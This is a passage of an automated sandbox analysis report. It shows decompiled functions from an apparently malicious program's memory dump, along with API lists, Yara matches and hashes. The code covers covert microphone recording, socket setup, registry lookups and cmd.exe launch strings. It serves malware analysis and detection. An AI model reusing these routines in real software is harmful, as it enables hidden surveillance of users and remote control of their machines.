				_t39 = E04EDF4C7(_t35, 0, 0, E04EC53C0,  &_v96, 0, 0);
				WaitForSingleObject(_v84, 0xffffffff);
				CloseHandle(_v84);
				 *((intOrPtr*)(_t45 + 0x24)) = _t39;
				return E04ED572E(_v12 ^ _t55, 0x20);
			}



















                                                                                    0x04ec19f6
                                                                                    0x04ec19fd
                                                                                    0x04ec1a00
                                                                                    0x04ec1a08
                                                                                    0x04ec1a10
                                                                                    0x04ec1a16
                                                                                    0x04ec1a19
                                                                                    0x04ec1a1c
                                                                                    0x04ec1a22
                                                                                    0x04ec1a29
                                                                                    0x04ec1a2c
                                                                                    0x04ec1a30
                                                                                    0x04ec1a32
                                                                                    0x04ec1a35
                                                                                    0x04ec1a3c
                                                                                    0x04ec1a40
                                                                                    0x04ec1a46
                                                                                    0x04ec1a4d
                                                                                    0x04ec1a51
                                                                                    0x04ec1a58
                                                                                    0x04ec1a5f
                                                                                    0x04ec1a63
                                                                                    0x04ec1a6a
                                                                                    0x04ec1a6d
                                                                                    0x04ec1a73
                                                                                    0x04ec1a74
                                                                                    0x04ec1a76
                                                                                    0x04ec1a79
                                                                                    0x04ec1a79
                                                                                    0x04ec1a83
                                                                                    0x04ec1a87
                                                                                    0x04ec1a8e
                                                                                    0x04ec1a93
                                                                                    0x04ec1a99
                                                                                    0x04ec1a9e
                                                                                    0x04ec1aae
                                                                                    0x04ec1ab4
                                                                                    0x04ec1ab8
                                                                                    0x04ec1abf
                                                                                    0x04ec1ac6
                                                                                    0x04ec1acd
                                                                                    0x04ec1ad5
                                                                                    0x04ec1adc
                                                                                    0x04ec1adf
                                                                                    0x04ec1aed
                                                                                    0x04ec1afd
                                                                                    0x04ec1b0c
                                                                                    0x04ec1b15
                                                                                    0x04ec1b21
                                                                                    0x04ec1b30

                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04EC1A1C
                                                                                    • LoadCursorW.USER32(00000000,?), ref: 04EC1A6D
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000020,00000000,00000108), ref: 04EC1AE3
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EC1B0C
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC1B15
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateEvent$CloseCursorHandleLoadObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 3220371329-3916222277
                                                                                    • Opcode ID: e0a76ff83a9426cc56699a7de2ae44c466bc47ee055e8bd6a28a78c509aa970f
                                                                                    • Instruction ID: 2f35f725f3498b1489c8f5715ce72fbe63d1e2b0ed47016498493ccdc00c8b90
                                                                                    • Opcode Fuzzy Hash: e0a76ff83a9426cc56699a7de2ae44c466bc47ee055e8bd6a28a78c509aa970f
                                                                                    • Instruction Fuzzy Hash: 5B41A471D00344AFEB019FA9DC857AABBB0FF44705F005259EE046F29ADBB5A981CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC1BF0, Relevance: 10.6, APIs: 7, Instructions: 87synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 55%
                                                                                    			E04EC1BF0(intOrPtr __ecx, intOrPtr _a4) {
				void* _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t23;
				void* _t36;
				int _t38;
				intOrPtr _t42;
				intOrPtr* _t45;
				intOrPtr _t49;
				void* _t51;

				_push(_t51);
				_t49 = __ecx;
				 *((char*)(__ecx + 0xc)) = 0;
				WaitForSingleObject( *(__ecx + 0x24), 0xffffffff);
				CloseHandle( *(_t49 + 0x24));
				_t45 =  *((intOrPtr*)(_t49 + 0xb0));
				_t59 = _t45;
				if(_t45 != 0) {
					 *((intOrPtr*)( *_t45))(1);
				}
				_t42 = _a4;
				_t23 = E04ED5744(_t51, _t59, 0x108);
				if(_t42 != 3) {
					__eflags = _t42 - 7;
					if(_t42 != 7) {
						_push(0);
						_push(_t42);
					} else {
						_push(1);
						_push(8);
					}
				} else {
					_push(1);
					_push(4);
				}
				 *((intOrPtr*)(_t49 + 0xb0)) = E04EC23B0(_t42, _t23, _t49, _t51);
				InterlockedExchange( *((intOrPtr*)(_t49 + 0xb0)) + 4,  *(_t49 + 0x18) & 0x000000ff);
				_t30 =  ==  ? 0xcc0020 : 0x40cc0020;
				InterlockedExchange( *((intOrPtr*)(_t49 + 0xb0)) + 0x10,  ==  ? 0xcc0020 : 0x40cc0020);
				 *((intOrPtr*)(_t49 + 0x20)) = _t42;
				 *((char*)(_t49 + 0xc)) = 1;
				_v32 = E04EC2010;
				_v28 = _t49;
				_v24 = 1;
				_v20 = CreateEventW(0, 0, 0, 0);
				_t36 = E04EDF4C7(0xcc0020, 0, 0, E04EC53C0,  &_v32, 0, 0);
				WaitForSingleObject(_v20, 0xffffffff);
				_t38 = CloseHandle(_v20);
				 *(_t49 + 0x24) = _t36;
				return _t38;
			}

















                                                                                    0x04ec1bfa
                                                                                    0x04ec1bfc
                                                                                    0x04ec1c03
                                                                                    0x04ec1c07
                                                                                    0x04ec1c10
                                                                                    0x04ec1c16
                                                                                    0x04ec1c1c
                                                                                    0x04ec1c1e
                                                                                    0x04ec1c24
                                                                                    0x04ec1c24
                                                                                    0x04ec1c26
                                                                                    0x04ec1c2e
                                                                                    0x04ec1c36
                                                                                    0x04ec1c3e
                                                                                    0x04ec1c41
                                                                                    0x04ec1c49
                                                                                    0x04ec1c4b
                                                                                    0x04ec1c43
                                                                                    0x04ec1c43
                                                                                    0x04ec1c45
                                                                                    0x04ec1c45
                                                                                    0x04ec1c38
                                                                                    0x04ec1c38
                                                                                    0x04ec1c3a
                                                                                    0x04ec1c3a
                                                                                    0x04ec1c59
                                                                                    0x04ec1c6e
                                                                                    0x04ec1c7e
                                                                                    0x04ec1c8c
                                                                                    0x04ec1c96
                                                                                    0x04ec1c99
                                                                                    0x04ec1c9d
                                                                                    0x04ec1ca5
                                                                                    0x04ec1ca9
                                                                                    0x04ec1cb8
                                                                                    0x04ec1cca
                                                                                    0x04ec1cda
                                                                                    0x04ec1ce4
                                                                                    0x04ec1cea
                                                                                    0x04ec1cf3

                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(000000FF,000000FF), ref: 04EC1C07
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC1C10
                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 04EC1C6E
                                                                                    • InterlockedExchange.KERNEL32(?,40CC0020), ref: 04EC1C8C
                                                                                    • CreateEventW.KERNEL32 ref: 04EC1CAE
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000), ref: 04EC1CDA
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC1CE4
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseExchangeHandleInterlockedObjectSingleWait$CreateEvent
                                                                                    • String ID:
                                                                                    • API String ID: 939225815-0
                                                                                    • Opcode ID: b7f546e07026500a4c0ab8be9665bb58232939ae8be0de2a43fd911729d2b578
                                                                                    • Instruction ID: 2de5e928b3271606bf8ecf25c873f7ad1d78a2c6f1cea8124c0e88381e49ce2d
                                                                                    • Opcode Fuzzy Hash: b7f546e07026500a4c0ab8be9665bb58232939ae8be0de2a43fd911729d2b578
                                                                                    • Instruction Fuzzy Hash: 8531E371704301BFE7049B29CD05F66FBE5FB48715F10025AFA589A2C1CBB5B8508BD6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB13D0, Relevance: 10.6, APIs: 7, Instructions: 79threadCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E04EB13D0(void* __ecx) {
				long _v8;
				char _v12;
				HWAVEIN* _t41;
				void* _t47;
				struct wavehdr_tag** _t49;

				_t47 = __ecx;
				if(waveInGetNumDevs() != 0) {
					_v8 = 0;
					 *(_t47 + 0x2c) = CreateThread(0, 0, E04EB1550, __ecx, 4,  &_v8);
					_t41 = _t47 + 0x18;
					if(waveInOpen(_t41, 0xffff, _t47 + 0x46, _v8, 0, 0x20000) == 0) {
						_t49 = _t47 + 0x30;
						_v12 = 2;
						do {
							 *( *_t49) =  *(_t49 - 0x28);
							 *_t49->dwBufferLength =  *(_t47 + 4);
							 *_t49->dwFlags = 0;
							 *_t49->dwLoops = 0;
							waveInPrepareHeader( *_t41,  *_t49, 0x20);
							_t14 =  &_v12;
							 *_t14 = _v12 - 1;
							_t49 =  &(_t49[1]);
						} while ( *_t14 != 0);
						waveInAddBuffer( *_t41,  *(_t47 + 0x30 +  *(_t47 + 0x1c) * 4), 0x20);
						ResumeThread( *(_t47 + 0x2c));
						waveInStart( *_t41);
						 *((char*)(_t47 + 0x44)) = 1;
						return 1;
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}








                                                                                    0x04eb13d7
                                                                                    0x04eb13e1
                                                                                    0x04eb13ee
                                                                                    0x04eb1412
                                                                                    0x04eb1415
                                                                                    0x04eb142a
                                                                                    0x04eb1435
                                                                                    0x04eb1438
                                                                                    0x04eb1440
                                                                                    0x04eb1447
                                                                                    0x04eb144e
                                                                                    0x04eb1453
                                                                                    0x04eb145c
                                                                                    0x04eb1467
                                                                                    0x04eb146d
                                                                                    0x04eb146d
                                                                                    0x04eb1471
                                                                                    0x04eb1471
                                                                                    0x04eb1481
                                                                                    0x04eb148a
                                                                                    0x04eb1492
                                                                                    0x04eb149a
                                                                                    0x04eb14a4
                                                                                    0x04eb142c
                                                                                    0x04eb1433
                                                                                    0x04eb1433
                                                                                    0x04eb13e3
                                                                                    0x04eb13e9
                                                                                    0x04eb13e9

                                                                                    APIs
                                                                                    • waveInGetNumDevs.WINMM ref: 04EB13D9
                                                                                    • CreateThread.KERNEL32(00000000,00000000,04EB1550,?,00000004,?), ref: 04EB1402
                                                                                    • waveInOpen.WINMM(00000004,0000FFFF,?,00000000,00000000,00020000,?,00000004,?), ref: 04EB1422
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wave$CreateDevsOpenThread
                                                                                    • String ID:
                                                                                    • API String ID: 3981276002-0
                                                                                    • Opcode ID: 5da8269cd4ca49b0debc5dcd36042bea61892eb805ca5d8970eba5192a76f308
                                                                                    • Instruction ID: d6f8a1d21802051b74b085a4bf372f5a99722d2bc4fd5146a9b52f0e01591ff2
                                                                                    • Opcode Fuzzy Hash: 5da8269cd4ca49b0debc5dcd36042bea61892eb805ca5d8970eba5192a76f308
                                                                                    • Instruction Fuzzy Hash: 19218B72640204BFDB20CFA9E848B95FBB9FF89305F104099EA4497650D772B825CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED1E60, Relevance: 10.6, APIs: 7, Instructions: 73COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 90%
                                                                                    			E04ED1E60(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* _t23;
				long _t24;
				void* _t27;
				long _t32;
				intOrPtr* _t41;
				void* _t42;
				void* _t43;

				_t41 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x118))() == 0) {
					L10:
					return 0;
				} else {
					E04ECE8D0(__ecx + 0x174);
					if( *(__ecx + 0x54) != 3) {
						 *((intOrPtr*)(__ecx + 0x58)) = 1;
						SetLastError(0x139f);
						 *(_t41 + 0x174) = 0;
						goto L10;
					} else {
						 *(__ecx + 0x54) = 0;
						 *(__ecx + 0x174) = 0;
						 *((intOrPtr*)( *__ecx + 0x11c))();
						_t23 = E04ED2030(__ebx, __ecx, __ecx, _t42, _a4);
						_t43 = GetLastError;
						if(_t23 == 0) {
							L8:
							_t24 = GetLastError();
							 *((intOrPtr*)( *_t41))();
							SetLastError(_t24);
							return 0;
						} else {
							_t27 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
							 *(_t41 + 0x50) = _t27;
							if(_t27 == 0) {
								_t32 = GetLastError();
								 *((intOrPtr*)(_t41 + 0x58)) = 7;
								SetLastError(_t32);
							}
							if( *(_t41 + 0x50) == 0 || E04ED2150(_t41, _t41, _t43) == 0) {
								goto L8;
							} else {
								 *((intOrPtr*)(_t41 + 0x4c)) = _a8;
								 *((intOrPtr*)(_t41 + 0x54)) = 1;
								ResetEvent( *(_t41 + 0x3c));
								return 1;
							}
						}
					}
				}
			}












                                                                                    0x04ed1e65
                                                                                    0x04ed1e71
                                                                                    0x04ed1f48
                                                                                    0x04ed1f4c
                                                                                    0x04ed1e77
                                                                                    0x04ed1e7d
                                                                                    0x04ed1e86
                                                                                    0x04ed1f30
                                                                                    0x04ed1f37
                                                                                    0x04ed1f3d
                                                                                    0x00000000
                                                                                    0x04ed1e8c
                                                                                    0x04ed1e8c
                                                                                    0x04ed1e95
                                                                                    0x04ed1ea1
                                                                                    0x04ed1eac
                                                                                    0x04ed1eb1
                                                                                    0x04ed1eb9
                                                                                    0x04ed1f12
                                                                                    0x04ed1f12
                                                                                    0x04ed1f1a
                                                                                    0x04ed1f1d
                                                                                    0x04ed1f28
                                                                                    0x04ed1ebb
                                                                                    0x04ed1ec3
                                                                                    0x04ed1ec9
                                                                                    0x04ed1ece
                                                                                    0x04ed1ed0
                                                                                    0x04ed1ed3
                                                                                    0x04ed1eda
                                                                                    0x04ed1eda
                                                                                    0x04ed1ee4
                                                                                    0x00000000
                                                                                    0x04ed1ef1
                                                                                    0x04ed1ef7
                                                                                    0x04ed1efa
                                                                                    0x04ed1f01
                                                                                    0x04ed1f0f
                                                                                    0x04ed1f0f
                                                                                    0x04ed1ee4
                                                                                    0x04ed1eb9
                                                                                    0x04ed1e86

                                                                                    APIs
                                                                                      • Part of subcall function 04ECE8D0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ECE8E5
                                                                                      • Part of subcall function 04ECE8D0: SwitchToThread.KERNEL32(?,?,00000000,04ECE352,?,00000000,04EB8415,74E5F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,04EB87E8), ref: 04ECE8FD
                                                                                    • SetLastError.KERNEL32(0000139F), ref: 04ED1F37
                                                                                      • Part of subcall function 04ED2030: socket.WS2_32(?,00000001,00000006), ref: 04ED2099
                                                                                      • Part of subcall function 04ED2030: bind.WS2_32(00000000,00000002,0000001C), ref: 04ED20BE
                                                                                      • Part of subcall function 04ED2030: closesocket.WS2_32(00000000), ref: 04ED20F4
                                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,?), ref: 04ED1EC3
                                                                                    • GetLastError.KERNEL32 ref: 04ED1ED0
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ED1EDA
                                                                                    • ResetEvent.KERNEL32(?), ref: 04ED1F01
                                                                                    • GetLastError.KERNEL32(?), ref: 04ED1F12
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ED1F1D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CompareCompletionCreateEventExchangeInterlockedPortResetSwitchThreadbindclosesocketsocket
                                                                                    • String ID:
                                                                                    • API String ID: 1231050892-0
                                                                                    • Opcode ID: b211a26ef4fc59488e9cd2450fb5b5d90b5935525cdf2e1816214e2541e65ed7
                                                                                    • Instruction ID: b4427d69fe0d8b3821c29d5d6acc4e604bf875e9781fad8d764b6b8ae798987d
                                                                                    • Opcode Fuzzy Hash: b211a26ef4fc59488e9cd2450fb5b5d90b5935525cdf2e1816214e2541e65ed7
                                                                                    • Instruction Fuzzy Hash: 0E214F31300602AFE714AFBAD8087D9FBA9FF84369F144166E909C7690DB75F865CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB6BF0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 73stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 52%
                                                                                    			E04EB6BF0(void* __ebx, void* __ecx, void* __edi, void* __esi, signed char _a4) {
				signed int _v8;
				signed int _v12;
				short _v532;
				char _v548;
				signed int _t15;
				signed int _t17;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t35;
				signed int _t37;

				_t27 = __ecx;
				_t26 = __ebx;
				_t37 = (_t35 & 0xfffffff8) - 0x224;
				_t15 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t15 ^ _t37;
				_t17 = _a4 & 0x000000ff;
				asm("xorps xmm0, xmm0");
				_t33 = __ecx;
				asm("movups [esp+0x8], xmm0");
				if(_t17 > 7) {
					L10:
					return E04ED572E(_v8 ^ _t37);
				} else {
					switch( *((intOrPtr*)(_t17 * 4 +  &M04EB6CE4))) {
						case 0:
							GetWindowsDirectoryW( &_v532, 0x104);
							lstrcatW( &_v532, L"\\explorer.exe");
							goto L9;
						case 1:
							_push(L"cmd.exe /c rundll32.exe shell32.dll,#61");
							goto L8;
						case 2:
							__eax = E04EB6870(__ebx, __ecx, __edi, __esi, __eflags, __ecx);
							_pop(__esi);
							__ecx = _v12;
							__ecx = _v12 ^ __esp;
							__eflags = __ecx;
							return E04ED572E(__ecx);
							goto L11;
						case 3:
							__eax = E04EB6950(__ebx, __ecx, __edi, __esi, __eflags, __ecx);
							_pop(__esi);
							__ecx = _v12;
							__ecx = _v12 ^ __esp;
							__eflags = __ecx;
							return E04ED572E(__ecx);
							goto L11;
						case 4:
							__eax = E04EB6A30(__ebx, __ecx, __edi, __esi, __eflags, __ecx);
							_pop(__esi);
							__ecx = _v12;
							__ecx = _v12 ^ __esp;
							__eflags = __ecx;
							return E04ED572E(__ecx);
							goto L11;
						case 5:
							goto L10;
						case 6:
							_push(L"cmd.exe /c start iexplore.exe");
							L8:
							 &_v532 = lstrcpyW( &_v532, ??);
							L9:
							_push( &_v548);
							_push( &_v532);
							_push(_t27);
							E04EC72A0(_t26,  *((intOrPtr*)(_t33 + 0x70)), _t39);
							_t37 = _t37 - 8 + 0x14;
							goto L10;
					}
				}
				L11:
			}














                                                                                    0x04eb6bf0
                                                                                    0x04eb6bf0
                                                                                    0x04eb6bf6
                                                                                    0x04eb6bfc
                                                                                    0x04eb6c03
                                                                                    0x04eb6c0a
                                                                                    0x04eb6c0e
                                                                                    0x04eb6c12
                                                                                    0x04eb6c14
                                                                                    0x04eb6c1c
                                                                                    0x04eb6ccc
                                                                                    0x04eb6cde
                                                                                    0x04eb6c22
                                                                                    0x04eb6c22
                                                                                    0x00000000
                                                                                    0x04eb6c33
                                                                                    0x04eb6c43
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb6c4b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb6c53
                                                                                    0x04eb6c58
                                                                                    0x04eb6c59
                                                                                    0x04eb6c60
                                                                                    0x04eb6c60
                                                                                    0x04eb6c6a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb6c6e
                                                                                    0x04eb6c73
                                                                                    0x04eb6c74
                                                                                    0x04eb6c7b
                                                                                    0x04eb6c7b
                                                                                    0x04eb6c85
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb6c89
                                                                                    0x04eb6c8e
                                                                                    0x04eb6c8f
                                                                                    0x04eb6c96
                                                                                    0x04eb6c96
                                                                                    0x04eb6ca0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb6ca3
                                                                                    0x04eb6ca8
                                                                                    0x04eb6cad
                                                                                    0x04eb6cb3
                                                                                    0x04eb6cba
                                                                                    0x04eb6cc2
                                                                                    0x04eb6cc3
                                                                                    0x04eb6cc4
                                                                                    0x04eb6cc9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb6c22
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 04EB6C33
                                                                                    • lstrcatW.KERNEL32(?,\explorer.exe), ref: 04EB6C43
                                                                                    • lstrcpyW.KERNEL32 ref: 04EB6CAD
                                                                                    Strings
                                                                                    • cmd.exe /c rundll32.exe shell32.dll,#61, xrefs: 04EB6C4B
                                                                                    • \explorer.exe, xrefs: 04EB6C39
                                                                                    • cmd.exe /c start iexplore.exe, xrefs: 04EB6CA3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DirectoryWindowslstrcatlstrcpy
                                                                                    • String ID: \explorer.exe$cmd.exe /c rundll32.exe shell32.dll,#61$cmd.exe /c start iexplore.exe
                                                                                    • API String ID: 4189314281-3733130215
                                                                                    • Opcode ID: 135497e05716e497b0eaab7694d1fcc14500351267a4a8fa09551d421b593458
                                                                                    • Instruction ID: 16483c1a334b1dbc55e69847fd076388d983cfa7ad9a0b3d68b887a6590c2e00
                                                                                    • Opcode Fuzzy Hash: 135497e05716e497b0eaab7694d1fcc14500351267a4a8fa09551d421b593458
                                                                                    • Instruction Fuzzy Hash: D12105B2614208ABD234EBB4F9468EBB3D8EF88315F105A5FF98586140EA74F454CBD7
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC6B30, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 90%
                                                                                    			E04EC6B30(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v88;
				short _v608;
				void* _v612;
				char _v616;
				int _v620;
				int _v624;
				signed int _t20;
				signed int _t52;

				_t20 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t20 ^ _t52;
				_v616 = 0;
				_v620 = 4;
				E04EC6010(__ebx, L"SEOID",  &_v88, __edi, __esi);
				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
				E04EDDAD0(__edi,  &_v616, 0, _v620);
				_v612 = 0;
				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612) != 0) {
					L3:
					return E04ED572E(_v8 ^ _t52);
				} else {
					RegQueryValueExW(_v612, "1", 0,  &_v624,  &_v616,  &_v620);
					_t51 =  ==  ? 1 : 0;
					RegCloseKey(_v612);
					_t58 =  ==  ? 1 : 0;
					if(( ==  ? 1 : 0) == 0) {
						goto L3;
					} else {
						return E04ED572E(_v8 ^ _t52);
					}
				}
			}












                                                                                    0x04ec6b39
                                                                                    0x04ec6b40
                                                                                    0x04ec6b47
                                                                                    0x04ec6b56
                                                                                    0x04ec6b60
                                                                                    0x04ec6b75
                                                                                    0x04ec6b8b
                                                                                    0x04ec6b93
                                                                                    0x04ec6bba
                                                                                    0x04ec6c12
                                                                                    0x04ec6c22
                                                                                    0x04ec6bbc
                                                                                    0x04ec6bdd
                                                                                    0x04ec6bf0
                                                                                    0x04ec6bf3
                                                                                    0x04ec6bf9
                                                                                    0x04ec6bfb
                                                                                    0x00000000
                                                                                    0x04ec6bfd
                                                                                    0x04ec6c11
                                                                                    0x04ec6c11
                                                                                    0x04ec6bfb

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EC6B75
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 04EC6BB2
                                                                                    • RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,?,?), ref: 04EC6BDD
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EC6BF3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue$wsprintf
                                                                                    • String ID: SEOID$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 3615287298-3437544703
                                                                                    • Opcode ID: f112dfac62d2c7c952dc01020a16bece2d3aef1af27867901166429b56259cac
                                                                                    • Instruction ID: cf448a92a9aaf289ee5a94a819ef4c5ee1f518ed87df19290fd737ab84d91c75
                                                                                    • Opcode Fuzzy Hash: f112dfac62d2c7c952dc01020a16bece2d3aef1af27867901166429b56259cac
                                                                                    • Instruction Fuzzy Hash: CC21107290522CABDB20DBA0DD49FEEB7BCEF44205F5001D9AD0AA6144DA366E84DF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC4730, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67timefileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 88%
                                                                                    			E04EC4730(WCHAR* __ecx, WCHAR* __edx, void* __esi) {
				signed int _v0;
				signed int _v8;
				struct _SYSTEMTIME _v24;
				struct _SYSTEMTIME _v40;
				struct _FILETIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				signed int _t16;
				WCHAR* _t45;
				signed int _t48;

				_t50 = (_t48 & 0xfffffff8) - 0x3c;
				_t16 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t16 ^ (_t48 & 0xfffffff8) - 0x0000003c;
				_t45 = __edx;
				if(GetFileTime(CreateFileW(__ecx, 0, 1, 0, 3, 0x80, 0),  &_v64,  &_v48,  &_v56) != 0) {
					FileTimeToSystemTime( &_v64,  &_v24);
					SystemTimeToTzSpecificLocalTime(0,  &_v24,  &_v40);
					wsprintfW(_t45, L"%04d-%02d-%02d  %02d:%02d", _v40.wYear & 0x0000ffff, _v40.wMonth & 0x0000ffff, _v40.wDay & 0x0000ffff, _v40.wHour & 0x0000ffff, _v40.wMinute & 0x0000ffff);
					return E04ED572E(_v0 ^ _t50 + 0x0000001c);
				} else {
					return E04ED572E(_v8 ^ _t50);
				}
			}













                                                                                    0x04ec4736
                                                                                    0x04ec4739
                                                                                    0x04ec4740
                                                                                    0x04ec4755
                                                                                    0x04ec4775
                                                                                    0x04ec4791
                                                                                    0x04ec47a3
                                                                                    0x04ec47cd
                                                                                    0x04ec47ea
                                                                                    0x04ec4777
                                                                                    0x04ec4786
                                                                                    0x04ec4786

                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(-00000220,00000000,00000001,00000000,00000003,00000080,00000000,00000012), ref: 04EC4757
                                                                                    • GetFileTime.KERNEL32(00000000,?,?,?), ref: 04EC476D
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 04EC4791
                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 04EC47A3
                                                                                    • wsprintfW.USER32 ref: 04EC47CD
                                                                                    Strings
                                                                                    • %04d-%02d-%02d %02d:%02d, xrefs: 04EC47C7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Time$File$System$CreateLocalSpecificwsprintf
                                                                                    • String ID: %04d-%02d-%02d %02d:%02d
                                                                                    • API String ID: 4290651727-1132360693
                                                                                    • Opcode ID: dc6ee063658b5f56cb0aa63756ba953219f0dd9c7312198db5e62f6888a1a373
                                                                                    • Instruction ID: a42df67e3eefc3a2528cdec15f522a5e7db3126308ae046c79702f2b69ef3840
                                                                                    • Opcode Fuzzy Hash: dc6ee063658b5f56cb0aa63756ba953219f0dd9c7312198db5e62f6888a1a373
                                                                                    • Instruction Fuzzy Hash: 28117272104304BED3509B54DC45FBB77DCEB88715F00460DF999D61C0E668E945C766
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB1550, Relevance: 10.6, APIs: 7, Instructions: 66windowsynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E04EB1550(intOrPtr _a4) {
				struct tagMSG _v32;
				intOrPtr _t19;
				signed int _t30;
				intOrPtr _t34;

				if(GetMessageW( &_v32, 0, 0, 0) == 0) {
					L7:
					return 0;
				} else {
					_t34 = _a4;
					do {
						_t19 = _v32.message;
						if(_t19 != 0x3c0) {
							L5:
							if(_t19 == 0x3bf) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							SetEvent( *(_t34 + 0x24));
							WaitForSingleObject( *(_t34 + 0x28), 0xffffffff);
							 *((intOrPtr*)(_t34 + 0x1c)) = 1;
							_t30 = waveInAddBuffer( *(_t34 + 0x18),  *(_t34 + 0x30 + (1 -  *((intOrPtr*)(_t34 + 0x1c))) * 4), 0x20);
							if(_t30 != 0) {
								return _t30 | 0xffffffff;
							} else {
								_t19 = _v32.message;
								goto L5;
							}
						}
						goto L9;
						L6:
